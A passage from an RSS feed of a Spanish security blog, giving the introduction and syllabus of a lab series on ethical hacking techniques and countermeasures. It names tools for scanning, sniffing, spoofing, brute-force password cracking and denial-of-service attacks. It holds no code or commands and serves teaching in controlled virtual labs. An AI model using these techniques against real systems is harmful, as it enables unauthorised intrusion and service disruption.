Consultar acerca de como llevar a cabo procesos de hardening de sistemas.</p>
<p style="text-align: justify;">Próxima sesión: Escaneo de vulnerabilidades II</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-escaneo-de-vulnerabilidades-i/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
		<item>
		<title>Laboratorios: Hacking, Técnicas y Contramedidas. Introducción y Contenido</title>
		<link>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido</link>
		<comments>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido#comments</comments>
		<pubDate>Tue, 12 Aug 2008 13:24:34 +0000</pubDate>
		<dc:creator>4v4t4r</dc:creator>
				<category><![CDATA[Hacking Tec/Cont]]></category>
		<category><![CDATA[Análisis de Malware]]></category>
		<category><![CDATA[Auditoría]]></category>
		<category><![CDATA[BackTrack]]></category>
		<category><![CDATA[Banner Identification]]></category>
		<category><![CDATA[Escaneo]]></category>
		<category><![CDATA[Herramientas]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[Sniffing]]></category>
		<category><![CDATA[VMWare]]></category>
		<category><![CDATA[Vulnerabilidades]]></category>
		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://labs.dragonjar.org/?p=1</guid>
		<description><![CDATA[<img src="http://img518.imageshack.us/img518/4940/icohackingsh0.jpg"  />]]></description>
			<content:encoded><![CDATA[<p style="text-align: justify;">El objetivo de los Laboratorios de Hacking &#8211; Técnicas y Contramedidas, es ofrecer de manera ordenada y secuencial, las técnicas, tácticas y contramedidas utilizadas en los diferentes campos de la seguridad informática, principalmente los que corresponden a test de penetración y hacking ético.</p>
<p><strong>Algunas notas aclaratorias:</strong></p>
<p>Los términos utilizados en los laboratorios referentes a “hacking”, “hacker”, etc, son bajo la definición de especialistas en seguridad y sistemas informáticos. Muy diferente a la definición que dan algunos medios de información, relacionandolos con delincuentes. Para mí (apreciación personal), las personas que se dedican a causar estragos, robos, y demás actos, reciben la denominación de delincuentes informáticos; (personas que realizan actos delictivos mediante la utilización de herramientas informáticas).</p>
<p style="text-align: justify;"><span id="more-1"></span>El contenido temático de los laboratorios estará dirigido para usuarios con un nivel de conocimientos del tema comprendido entre básico y medio. El material expuesto no está enfocado para usuarios de amplia experiencia en el tema, por el contrario pretende acercar a los entusiastas de aprender y que aún no encuentran la manera de comenzar de un modo más práctico. Pretende refrescar un poco los conocimientos de usuarios avanzados, y pretende invitar a los mismos a desarrollar sus propios laboratorios para el conocimiento de toda la comunidad investigadora.<br />
Los laboratorios pretenden ser lo más práctico posible, obviamente citando las fuentes de profundización para obtener más información sobre los temas tratados.<br />
Casi la totalidad de los laboratorios serán llevados a cabo bajo entornos controlados de instrusión, utilizando máquinas virtuales, con diferentes sistemas operativos, entre ellos “<a href="http://es.wikipedia.org/wiki/BackTrack" target="_blank"><strong>BackTrack</strong></a>”, “<strong><a href="http://es.wikipedia.org/wiki/Opensuse" target="_blank">OpenSuSe Linux</a></strong>”, “<a href="http://www.microsoft.com/latam/windowsserver2003/evaluation/overview/enterprise.mspx" target="_blank"><strong>Windows Server 2003 Edición Enterprise</strong></a>”, “<a href="http://www.netbsd.org/es/" target="_blank"><strong>NetBSD</strong></a>”, entre otros.</p>
<p style="text-align: justify;"><strong>Contenido:</strong></p>
<ul>
<li><strong>Introducción y descripción de los laboratorios.</strong></li>
</ul>
<p style="text-align: justify;">Instalación y configuración del ambiente virtual controlado de los laboratorios. (Instalación de VMware WorkStation &#8211; Instalación de la distribución BackTrack &#8211; Instalación de Windows 2003 Server Enterprise Edition &#8211; Instalación de las VMware Tools)</p>
<ul>
<li><strong>Identificación de Banner’s (banderas)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la identificación de banner’s (utilización de las herramientas y procedimientos: telnet, netcat, Scanline, Xprobe2, AMAP y banner.c, para la identificación de banner’s.)</p>
<ul>
<li><strong>Enumeración del objetivo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del target enumeration (utilización de las herramientas y procedimientos: nullsesion, getmac, user2sid, sid2user, userdump, userinfo, dumpsec, comandos net, ping’s, pathping’s, nmap, nmapfe, nslookup, nmblookup, rpcinfo, visual route, sam spade, netcraft, sprint y winfingerprint, para la enumeración del objetivo).</p>
<ul>
<li><strong>Escaneo</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del scanning (utilización de las herramientas y procedimientos: Angry IP, LANguard, Fscan, Passifist, Lanspy, Netcat, Superscan, Strobe, FTPScanner, TCS CGI Scanner, Hydra, WGateScan/ADM Gates, para las diferentes técnicas de escaneo) .</p>
<ul>
<li><strong>Sniffing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del sniffing (utilización de las herramientas y procedimientos: Ethereal-Wireshark, Ngrep, TcpDump, WinDump, IPDump2, ZxSniffer y Sniffit, para las diferentes ténicas del sniffing)</p>
<ul>
<li><strong>Spoofing</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del spoofing (utilización de las herramientas y procedimientos: RafaleX, SMAC y Packit, para las diferentes técnicas del spoofing).</p>
<ul>
<li><strong>Ataques de fuerza bruta</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del brute force (utilización de las herramientas y procedimientos: NETWOX/NETWAG, FGDump, LC, Cain, CHNTPW, John the ripper, BruteFTP y TSGrinder II, para las diferentes técnias de brute force).</p>
<ul>
<li><strong>Escaneo de vulnerabilidades</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición del Vulnerability Scanning (utilización de las herramientas y procedimientos: SAINT, NETWOX/NETWAG, Solar Winds, Retina, X-scan, SARA, N-Stealth, Pluto, Metasploit, Nikto, SSS, Cerberus, AutoScan, Nessus y Core Impact, para las diferentes técnicas del vulnerability scanning).</p>
<ul>
<li><strong>Redireccionamiento</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la redirección (utilización de las herramientas y procedimientos: PortMapper, EliteWrap, Fpipe, PsExec y NETWOX/NETWAG, para las diferentes técnicas de la redirección) .</p>
<ul>
<li><strong>Denegación del Servicio (DoS)</strong></li>
</ul>
<p style="text-align: justify;">Descripción y definición de la Denegación del Servicio (utilización de las herramientas y procedimientos: Land Attack, Smurf Attack, SYN Attack, UDP Flood y Trash 2.c, para las diferentes técnicas de Denegación del Servicio).</p>
]]></content:encoded>
			<wfw:commentRss>http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-introduccion-y-contenido/feed</wfw:commentRss>
		<slash:comments>10</slash:comments>
		</item>
	</channel>
</rss>

